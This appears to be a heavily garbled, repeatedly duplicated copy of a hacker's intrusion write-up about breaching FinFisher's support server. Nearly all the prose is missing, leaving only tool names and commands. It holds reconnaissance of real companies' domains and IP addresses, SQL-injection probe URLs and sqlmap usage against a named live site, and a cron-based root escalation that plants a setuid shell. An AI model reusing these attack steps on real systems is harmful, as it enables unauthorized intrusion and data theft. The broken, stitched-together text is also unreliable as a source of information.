nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
